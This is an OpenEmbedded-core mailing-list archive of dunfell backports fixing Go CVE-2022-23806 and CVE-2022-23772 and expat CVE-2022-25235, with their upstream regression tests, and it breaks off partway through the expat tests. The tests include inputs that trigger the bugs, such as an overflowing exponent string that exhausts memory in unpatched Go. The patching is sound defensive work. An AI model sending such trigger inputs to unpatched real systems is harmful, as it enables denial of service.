Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
From: "Steve Sakoman" <steve@sakoman.com>
Subject: [OE-core][dunfell 02/18] go: fix CVE-2022-23806
Date: Fri,  4 Mar 2022 05:04:10 -1000
Message-Id: 
 <eb7aa0929ecd712aeeec0ff37dfb77c3da33b375.1646406001.git.steve@sakoman.com>
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-id: <openembedded-core.lists.openembedded.org>
To: openembedded-core@lists.openembedded.org

From: Minjae Kim <flowergom@gmail.com>

crypto/elliptic: fix IsOnCurve for big.Int values that are not valid coordinates

Some big.Int values that are not valid field elements (negative or overflowing)
might cause Curve.IsOnCurve to incorrectly return true. Operating on those values
may cause a panic or an invalid curve operation. Note that Unmarshal will never
return such values.

Upstream-Status: Backport [https://go.dev/issue/50974]
CVE: CVE-2022-23806
Signed-off-by:Minjae Kim <flowergom@gmail.com>
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/recipes-devtools/go/go-1.14.inc          |   1 +
 .../go/go-1.14/CVE-2022-23806.patch           | 142 ++++++++++++++++++
 2 files changed, 143 insertions(+)
 create mode 100644 meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch

diff --git a/meta/recipes-devtools/go/go-1.14.inc b/meta/recipes-devtools/go/go-1.14.inc
index abc6f42184..fcb316e09e 100644
--- a/meta/recipes-devtools/go/go-1.14.inc
+++ b/meta/recipes-devtools/go/go-1.14.inc
@@ -19,6 +19,7 @@ SRC_URI += "\
     file://CVE-2021-34558.patch \
     file://CVE-2021-33196.patch \
     file://CVE-2021-33197.patch \
+    file://CVE-2022-23806.patch \
 "
 SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch"
 SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149"
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
new file mode 100644
index 0000000000..772acdcbf6
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
@@ -0,0 +1,142 @@
+From 5b376a209d1c61e10847e062d78c4b1aa90dff0c Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Sat, 26 Feb 2022 10:40:57 +0000
+Subject: [PATCH] crypto/elliptic: make IsOnCurve return false for invalid
+
+ field elements
+
+Updates #50974
+Fixes #50977
+Fixes CVE-2022-23806
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+
+---
+ src/crypto/elliptic/elliptic.go      |  6 +++
+ src/crypto/elliptic/elliptic_test.go | 81 ++++++++++++++++++++++++++++
+ src/crypto/elliptic/p224.go          |  6 +++
+ 3 files changed, 93 insertions(+)
+
+diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
+index e2f71cd..bd574a4 100644
+--- a/src/crypto/elliptic/elliptic.go
++++ b/src/crypto/elliptic/elliptic.go
+@@ -53,6 +53,12 @@ func (curve *CurveParams) Params() *CurveParams {
+ }
+ 
+ func (curve *CurveParams) IsOnCurve(x, y *big.Int) bool {
++
++	if x.Sign() < 0 || x.Cmp(curve.P) >= 0 ||
++		y.Sign() < 0 || y.Cmp(curve.P) >= 0 {
++		return false
++	}
++
+ 	// y² = x³ - 3x + b
+ 	y2 := new(big.Int).Mul(y, y)
+ 	y2.Mod(y2, curve.P)
+diff --git a/src/crypto/elliptic/elliptic_test.go b/src/crypto/elliptic/elliptic_test.go
+index 09c5483..b13a620 100644
+--- a/src/crypto/elliptic/elliptic_test.go
++++ b/src/crypto/elliptic/elliptic_test.go
+@@ -628,3 +628,84 @@ func TestUnmarshalToLargeCoordinates(t *testing.T) {
+ 		t.Errorf("Unmarshal accepts invalid Y coordinate")
+ 	}
+ }
++
++func testAllCurves(t *testing.T, f func(*testing.T, Curve)) {
++	tests := []struct {
++		name  string
++		curve Curve
++	}{
++		{"P256", P256()},
++		{"P256/Params", P256().Params()},
++		{"P224", P224()},
++		{"P224/Params", P224().Params()},
++		{"P384", P384()},
++		{"P384/Params", P384().Params()},
++		{"P521", P521()},
++		{"P521/Params", P521().Params()},
++	}
++	if testing.Short() {
++		tests = tests[:1]
++	}
++	for _, test := range tests {
++		curve := test.curve
++		t.Run(test.name, func(t *testing.T) {
++			t.Parallel()
++			f(t, curve)
++		})
++	}
++}
++
++// TestInvalidCoordinates tests big.Int values that are not valid field elements
++// (negative or bigger than P). They are expected to return false from
++// IsOnCurve, all other behavior is undefined.
++func TestInvalidCoordinates(t *testing.T) {
++	testAllCurves(t, testInvalidCoordinates)
++}
++
++func testInvalidCoordinates(t *testing.T, curve Curve) {
++	checkIsOnCurveFalse := func(name string, x, y *big.Int) {
++		if curve.IsOnCurve(x, y) {
++			t.Errorf("IsOnCurve(%s) unexpectedly returned true", name)
++		}
++	}
++
++	p := curve.Params().P
++	_, x, y, _ := GenerateKey(curve, rand.Reader)
++	xx, yy := new(big.Int), new(big.Int)
++
++	// Check if the sign is getting dropped.
++	xx.Neg(x)
++	checkIsOnCurveFalse("-x, y", xx, y)
++	yy.Neg(y)
++	checkIsOnCurveFalse("x, -y", x, yy)
++
++	// Check if negative values are reduced modulo P.
++	xx.Sub(x, p)
++	checkIsOnCurveFalse("x-P, y", xx, y)
++	yy.Sub(y, p)
++	checkIsOnCurveFalse("x, y-P", x, yy)
++
++	// Check if positive values are reduced modulo P.
++	xx.Add(x, p)
++	checkIsOnCurveFalse("x+P, y", xx, y)
++	yy.Add(y, p)
++	checkIsOnCurveFalse("x, y+P", x, yy)
++
++	// Check if the overflow is dropped.
++	xx.Add(x, new(big.Int).Lsh(big.NewInt(1), 535))
++	checkIsOnCurveFalse("x+2⁵³⁵, y", xx, y)
++	yy.Add(y, new(big.Int).Lsh(big.NewInt(1), 535))
++	checkIsOnCurveFalse("x, y+2⁵³⁵", x, yy)
++
++	// Check if P is treated like zero (if possible).
++	// y^2 = x^3 - 3x + B
++	// y = mod_sqrt(x^3 - 3x + B)
++	// y = mod_sqrt(B) if x = 0
++	// If there is no modsqrt, there is no point with x = 0, can't test x = P.
++	if yy := new(big.Int).ModSqrt(curve.Params().B, p); yy != nil {
++		if !curve.IsOnCurve(big.NewInt(0), yy) {
++			t.Fatal("(0, mod_sqrt(B)) is not on the curve?")
++		}
++		checkIsOnCurveFalse("P, y", p, yy)
++	}
++}
+diff --git a/src/crypto/elliptic/p224.go b/src/crypto/elliptic/p224.go
+index 8c76021..f1bfd7e 100644
+--- a/src/crypto/elliptic/p224.go
++++ b/src/crypto/elliptic/p224.go
+@@ -48,6 +48,12 @@ func (curve p224Curve) Params() *CurveParams {
+ }
+ 
+ func (curve p224Curve) IsOnCurve(bigX, bigY *big.Int) bool {
++
++	if bigX.Sign() < 0 || bigX.Cmp(curve.P) >= 0 ||
++		bigY.Sign() < 0 || bigY.Cmp(curve.P) >= 0 {
++		return false
++	}
++
+ 	var x, y p224FieldElement
+ 	p224FromBig(&x, bigX)
+ 	p224FromBig(&y, bigY)

From patchwork Fri Mar  4 15:04:11 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4676
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 07612C433F5
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:04:54 +0000 (UTC)
Received: from mail-pj1-f50.google.com (mail-pj1-f50.google.com
 [209.85.216.50])
 by mx.groups.io with SMTP id smtpd.web10.7840.1646406292770788095
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:04:53 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=x5IgWclN;
 spf=softfail (domain: sakoman.com, ip: 209.85.216.50,
 mailfrom: steve@sakoman.com)
Received: by mail-pj1-f50.google.com with SMTP id
 p3-20020a17090a680300b001bbfb9d760eso10817902pjj.2
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:04:52 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=wdxGlIgnJGiz3lGKvCaGxmrdBY7AVdGMNueth6HAC1E=;
        b=x5IgWclNSh8Y59a/tRX/OPLT5Lsxwuq/tDCrBgwZV11LBD8X7PYOdWP4jRYfkitdjm
         U9qTrXks+prmQk4gD2QxUA7g/3G6LClDYV5thYal5t+1Yg2pqRm2eUakztFb/4V+5RAL
         OF/mDPR8+McXTQoN46p9yDe8+ILPx23/5zwzeLEwjGByGbX97Z63+yPpup+JboFC1uGC
         MkpsgoCoe3r2YolEutGCugndFzRKwaK6mX9z+fw3Av0+QwDeti/pK6BBQx1R26vI82Cv
         G6Avj2lcVdC5OS8BWmxgvbyQEt9zQh/Igroey0ng8oqhHq/b/4s5WS58C+DNA8ktpAHc
         oJdg==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=wdxGlIgnJGiz3lGKvCaGxmrdBY7AVdGMNueth6HAC1E=;
        b=fjuK+4S7XcS3UhZkE3fLHnM7Lo97BFtgyv/jbka/ZoKIoLriA6ZNbL3+W6KeSBztBd
         TIagM+nhSa4I15qFoNeDtXveUuVjVloQ/DHRAS7FpGWnclm/H6H1OIXnVcxYRG2/PSyi
         trwN+HC6CFJOvG4Zd7LjCGyCx51/5d9YzyITzaRaCSXQQAYjhwJBFakfCVGuHg4FyrOw
         ZxuGeaz+eCvNw/eJMPDDFdnSaqvvuHYlt6akJ+w+hyPEbdY7f+JhC37U6EhLMm2NoM/h
         u0iRiZoUJtIHdQ+VXWri+Q+vPEBwhWj1jZijxQds6kOl8yy+bUOXHeezF2OOHMugSLqS
         M3dg==
X-Gm-Message-State: AOAM530dKo1MSfFELbyi0XlDwzdVWFn5osjYbGFd5ZOcCf9xEwhu2mJW
	3wFja8eG/2jNRTGQEkUF+va38xF89SQF4aDVUd0=
X-Google-Smtp-Source: 
 ABdhPJz4IUzjbG7j20IUBN9lXdM3J275IDFvYejkOL9TLmAsxfPS3AbYBL2gfXDXSM2V1/WZuqu4Dg==
X-Received: by 2002:a17:90a:4146:b0:1bf:2dc8:7407 with SMTP id
 m6-20020a17090a414600b001bf2dc87407mr2201300pjg.76.1646406291731;
        Fri, 04 Mar 2022 07:04:51 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.04.50
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:04:51 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 03/18] go: fix CVE-2022-23772
Date: Fri,  4 Mar 2022 05:04:11 -1000
Message-Id: 
 <e4d15040f62744265b9236ad7276f3371a9172da.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:04:54 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162722

From: Minjae Kim <flowergom@gmail.com>

math/big: prevent large memory consumption in Rat.SetString

An attacker can cause unbounded memory growth in a program using (*Rat).SetString
due to an unhandled overflow.

Upstream-Status: Backport [https://go.dev/issue/50699]
CVE: CVE-2022-23772
Signed-off-by:Minjae Kim <flowergom@gmail.com>
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/recipes-devtools/go/go-1.14.inc          |  1 +
 .../go/go-1.14/CVE-2022-23772.patch           | 50 +++++++++++++++++++
 2 files changed, 51 insertions(+)
 create mode 100644 meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch

diff --git a/meta/recipes-devtools/go/go-1.14.inc b/meta/recipes-devtools/go/go-1.14.inc
index fcb316e09e..9b3c3b30a8 100644
--- a/meta/recipes-devtools/go/go-1.14.inc
+++ b/meta/recipes-devtools/go/go-1.14.inc
@@ -20,6 +20,7 @@ SRC_URI += "\
     file://CVE-2021-33196.patch \
     file://CVE-2021-33197.patch \
     file://CVE-2022-23806.patch \
+    file://CVE-2022-23772.patch \
 "
 SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch"
 SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149"
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
new file mode 100644
index 0000000000..f0daee3624
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
@@ -0,0 +1,50 @@
+From 70882eedccac803ddcf1c3215e0ae8fd59847e39 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Sat, 26 Feb 2022 20:03:38 +0000
+Subject: [PATCH] [release-branch.go1.16] math/big: prevent overflow in
+ (*Rat).SetString
+
+Credit to rsc@ for the original patch.
+
+Thanks to the OSS-Fuzz project for discovering this
+issue and to Emmanuel Odeke (@odeke_et) for reporting it.
+
+Updates #50699
+Fixes #50700
+Fixes CVE-2022-23772
+---
+ src/math/big/ratconv.go      | 5 +++++
+ src/math/big/ratconv_test.go | 1 +
+ 2 files changed, 6 insertions(+)
+
+diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
+index 941139e..e8cbdbe 100644
+--- a/src/math/big/ratconv.go
++++ b/src/math/big/ratconv.go
+@@ -168,6 +168,11 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ 		n := exp5
+ 		if n < 0 {
+ 			n = -n
++			if n < 0 {
++				// This can occur if -n overflows. -(-1 << 63) would become
++				// -1 << 63, which is still negative.
++				return nil, false
++			}
+ 		}
+ 		pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
+ 		if exp5 > 0 {
+diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
+index ba0d1ba..b820df4 100644
+--- a/src/math/big/ratconv_test.go
++++ b/src/math/big/ratconv_test.go
+@@ -104,6 +104,7 @@ var setStringTests = []StringTest{
+ 	{in: "4/3/"},
+ 	{in: "4/3."},
+ 	{in: "4/"},
++	{in: "13e-9223372036854775808"}, // CVE-2022-23772
+ 
+ 	// valid
+ 	{"0", "0", true},
+-- 
+2.17.1
+

From patchwork Fri Mar  4 15:04:12 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4677
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 0C506C433EF
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:04:56 +0000 (UTC)
Received: from mail-pg1-f181.google.com (mail-pg1-f181.google.com
 [209.85.215.181])
 by mx.groups.io with SMTP id smtpd.web11.7942.1646406295589241111
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:04:55 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=E0DetpGQ;
 spf=softfail (domain: sakoman.com, ip: 209.85.215.181,
 mailfrom: steve@sakoman.com)
Received: by mail-pg1-f181.google.com with SMTP id 195so7747111pgc.6
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:04:55 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=+VIPxverKIPH7mpG29z537Q0uQUlDTlGNDEycqZnj24=;
        b=E0DetpGQjIRC8OmMTD84tyGWSDVRDBmUYyaH6w0Ymp33xe6ymbtZux3bCZIxn3qD6T
         k218f4DpoGAVOax2LurAhlrY67zy4U6pa7N5nMAN2fO988klIhK+62Eik5ofjxnA2UbK
         edO0nj1gdTOdxDyH9MbF1QgOeH1mfjASiBtHjoGatkXuSBcejgtdei02DwxvlW854oej
         jNyPoRYqBLk1aD70FkpSaYEY8Kb6Z+T69CKU3BAD2L9mtwWsyEYbyUoyK7gk3+XK6Nsm
         K+FIFnn9Y3PQgWR4T6VnH/82qkvQ1cAtV09yadXG8iXRrxGk1QmiRzE3aquu28omtfWX
         Q63g==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=+VIPxverKIPH7mpG29z537Q0uQUlDTlGNDEycqZnj24=;
        b=N/NM3rE69sKskWFg2Y4LdsjnviQJPf4rjKH+uZ9ANccRzNqNwwq0EiAmehV7ZrTG24
         FHBhhDZnCaXAqywQ/dGldr6QSdmVxqo36YxUSX69GXp5haQX1NPn+qyAfmgma9Jx/kfP
         wg3SDMwNlFWIcPYiLXN62r1/8tDsLAyRJzkUENsPWtadq8gVQE8rQJlM3q9ezGClNSJj
         GeCzBJCzHgGONSJUzv/HZVw/F9IHpDWM3sKot4jRpr28SN7QNBzTv5jNgyuZ0B9It+cF
         dXf0a9cG1UMwsMQr+is6wlBzBL5iAzmhMeP+7DCYOjn3wugqB4UERHs8xfDceTCAaOn0
         ZitQ==
X-Gm-Message-State: AOAM532AfNOECso6LLObua2XXKFXTnVWVkaGSO4d+f1Btg0jk4q6z3wP
	EyA7NXCtrRR9RSvQ7Ej/DjxIqRfEJlpaCGwZYmU=
X-Google-Smtp-Source: 
 ABdhPJzMQhXSpBateW424KPBVe0+975KrG8iWQ8skXj1CEIWLKwhKsxGsmQudXHepCwX5d97btiswg==
X-Received: by 2002:a63:3d0b:0:b0:37f:ef34:1431 with SMTP id
 k11-20020a633d0b000000b0037fef341431mr87078pga.547.1646406294105;
        Fri, 04 Mar 2022 07:04:54 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.04.52
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:04:53 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 04/18] expat: fix CVE-2022-25235
Date: Fri,  4 Mar 2022 05:04:12 -1000
Message-Id: 
 <27ab07b1e8caa5c85526eee4a7a3ad0d73326866.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:04:56 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162723

xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain
validation of encoding, such as checks for whether a UTF-8 character
is valid in a certain context.

Backport patches from:
https://github.com/libexpat/libexpat/pull/562/commits

CVE: CVE-2022-25235

Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 .../expat/expat/CVE-2022-25235.patch          | 283 ++++++++++++++++++
 meta/recipes-core/expat/expat_2.2.9.bb        |   1 +
 2 files changed, 284 insertions(+)
 create mode 100644 meta/recipes-core/expat/expat/CVE-2022-25235.patch

diff --git a/meta/recipes-core/expat/expat/CVE-2022-25235.patch b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
new file mode 100644
index 0000000000..be9182a5c1
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
@@ -0,0 +1,283 @@
+From ee2a5b50e7d1940ba8745715b62ceb9efd3a96da Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 17:37:14 +0100
+Subject: [PATCH] lib: Drop unused macro UTF8_GET_NAMING
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/562/commits
+
+CVE: CVE-2022-25235
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmltok.c | 5 -----
+ 1 file changed, 5 deletions(-)
+
+diff --git a/lib/xmltok.c b/lib/xmltok.c
+index a72200e8..3bddf125 100644
+--- a/lib/xmltok.c
++++ b/lib/xmltok.c
+@@ -95,11 +95,6 @@
+         + ((((byte)[1]) & 3) << 1) + ((((byte)[2]) >> 5) & 1)]                 \
+    & (1u << (((byte)[2]) & 0x1F)))
+ 
+-#define UTF8_GET_NAMING(pages, p, n)                                           \
+-  ((n) == 2                                                                    \
+-       ? UTF8_GET_NAMING2(pages, (const unsigned char *)(p))                   \
+-       : ((n) == 3 ? UTF8_GET_NAMING3(pages, (const unsigned char *)(p)) : 0))
+-
+ /* Detection of invalid UTF-8 sequences is based on Table 3.1B
+    of Unicode 3.2: http://www.unicode.org/unicode/reports/tr28/
+    with the additional restriction of not allowing the Unicode
+From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:32:20 +0100
+Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/lib/xmltok_impl.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 0430591b4..64a3b2c15 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -61,7 +61,7 @@
+   case BT_LEAD##n:                                                             \
+     if (end - ptr < n)                                                         \
+       return XML_TOK_PARTIAL_CHAR;                                             \
+-    if (! IS_NAME_CHAR(enc, ptr, n)) {                                         \
++    if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) {         \
+       *nextTokPtr = ptr;                                                       \
+       return XML_TOK_INVALID;                                                  \
+     }                                                                          \
+@@ -90,7 +90,7 @@
+   case BT_LEAD##n:                                                             \
+     if (end - ptr < n)                                                         \
+       return XML_TOK_PARTIAL_CHAR;                                             \
+-    if (! IS_NMSTRT_CHAR(enc, ptr, n)) {                                       \
++    if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) {       \
+       *nextTokPtr = ptr;                                                       \
+       return XML_TOK_INVALID;                                                  \
+     }                                                                          \
+@@ -1134,6 +1134,10 @@ PREFIX(prologTok)(const ENCODING *enc, const char *ptr, const char *end,
+   case BT_LEAD##n:                                                             \
+     if (end - ptr < n)                                                         \
+       return XML_TOK_PARTIAL_CHAR;                                             \
++    if (IS_INVALID_CHAR(enc, ptr, n)) {                                        \
++      *nextTokPtr = ptr;                                                       \
++      return XML_TOK_INVALID;                                                  \
++    }                                                                          \
+     if (IS_NMSTRT_CHAR(enc, ptr, n)) {                                         \
+       ptr += n;                                                                \
+       tok = XML_TOK_NAME;                                                      \
+From c85a3025e7a1be086dc34e7559fbc543914d047f Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 9 Feb 2022 01:00:38 +0100
+Subject: [PATCH] lib: Add comments to BT_LEAD* cases where encoding has
+ already been validated
+
+---
+ expat/lib/xmltok_impl.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 64a3b2c1..84ff35f9 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -1266,7 +1266,7 @@ PREFIX(attributeValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+     switch (BYTE_TYPE(enc, ptr)) {
+ #  define LEAD_CASE(n)                                                         \
+   case BT_LEAD##n:                                                             \
+-    ptr += n;                                                                  \
++    ptr += n; /* NOTE: The encoding has already been validated. */             \
+     break;
+       LEAD_CASE(2)
+       LEAD_CASE(3)
+@@ -1335,7 +1335,7 @@ PREFIX(entityValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+     switch (BYTE_TYPE(enc, ptr)) {
+ #  define LEAD_CASE(n)                                                         \
+   case BT_LEAD##n:                                                             \
+-    ptr += n;                                                                  \
++    ptr += n; /* NOTE: The encoding has already been validated. */             \
+     break;
+       LEAD_CASE(2)
+       LEAD_CASE(3)
+@@ -1514,7 +1514,7 @@ PREFIX(getAtts)(const ENCODING *enc, const char *ptr, int attsMax,
+       state = inName;                                                          \
+     }
+ #  define LEAD_CASE(n)                                                         \
+-  case BT_LEAD##n:                                                             \
++  case BT_LEAD##n: /* NOTE: The encoding has already been validated. */        \
+     START_NAME ptr += (n - MINBPC(enc));                                       \
+     break;
+       LEAD_CASE(2)
+@@ -1726,7 +1726,7 @@ PREFIX(nameLength)(const ENCODING *enc, const char *ptr) {
+     switch (BYTE_TYPE(enc, ptr)) {
+ #  define LEAD_CASE(n)                                                         \
+   case BT_LEAD##n:                                                             \
+-    ptr += n;                                                                  \
++    ptr += n; /* NOTE: The encoding has already been validated. */             \
+     break;
+       LEAD_CASE(2)
+       LEAD_CASE(3)
+@@ -1771,7 +1771,7 @@ PREFIX(updatePosition)(const ENCODING *enc, const char *ptr, const char *end,
+     switch (BYTE_TYPE(enc, ptr)) {
+ #  define LEAD_CASE(n)                                                         \
+   case BT_LEAD##n:                                                             \
+-    ptr += n;                                                                  \
++    ptr += n; /* NOTE: The encoding has already been validated. */             \
+     break;
+       LEAD_CASE(2)
+       LEAD_CASE(3)
+From 6a5510bc6b7efe743356296724e0b38300f05379 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:06:21 +0100
+Subject: [PATCH] tests: Cover missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/tests/runtests.c | 109 +++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 109 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index bc5344b1..9b155b82 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -5998,6 +5998,105 @@ START_TEST(test_utf8_in_cdata_section_2) {
+ }
+ END_TEST
+ 
++START_TEST(test_utf8_in_start_tags) {
++  struct test_case {
++    bool goodName;
++    bool goodNameStart;
++    const char *tagName;
++  };
++
++  // The idea with the tests below is this:
++  // We want to cover 1-, 2- and 3-byte sequences, 4-byte sequences
++  // go to isNever and are hence not a concern.
++  //
++  // We start with a character that is a valid name character
++  // (or even name-start character, see XML 1.0r4 spec) and then we flip
++  // single bits at places where (1) the result leaves the UTF-8 encoding space
++  // and (2) we stay in the same n-byte sequence family.
++  //
++  // The flipped bits are highlighted in angle brackets in comments,
++  // e.g. "[<1>011 1001]" means we had [0011 1001] but we now flipped
++  // the most significant bit to 1 to leave UTF-8 encoding space.
++  struct test_case cases[] = {
++      // 1-byte UTF-8: [0xxx xxxx]
++      {true, true, "\x3A"},   // [0011 1010] = ASCII colon ':'
++      {false, false, "\xBA"}, // [<1>011 1010]
++      {true, false, "\x39"},  // [0011 1001] = ASCII nine '9'
++      {false, false, "\xB9"}, // [<1>011 1001]
++
++      // 2-byte UTF-8: [110x xxxx] [10xx xxxx]
++      {true, true, "\xDB\xA5"},   // [1101 1011] [1010 0101] =
++                                  // Arabic small waw U+06E5
++      {false, false, "\x9B\xA5"}, // [1<0>01 1011] [1010 0101]
++      {false, false, "\xDB\x25"}, // [1101 1011] [<0>010 0101]
++      {false, false, "\xDB\xE5"}, // [1101 1011] [1<1>10 0101]
++      {true, false, "\xCC\x81"},  // [1100 1100] [1000 0001] =
++                                  // combining char U+0301
++      {false, false, "\x8C\x81"}, // [1<0>00 1100] [1000 0001]
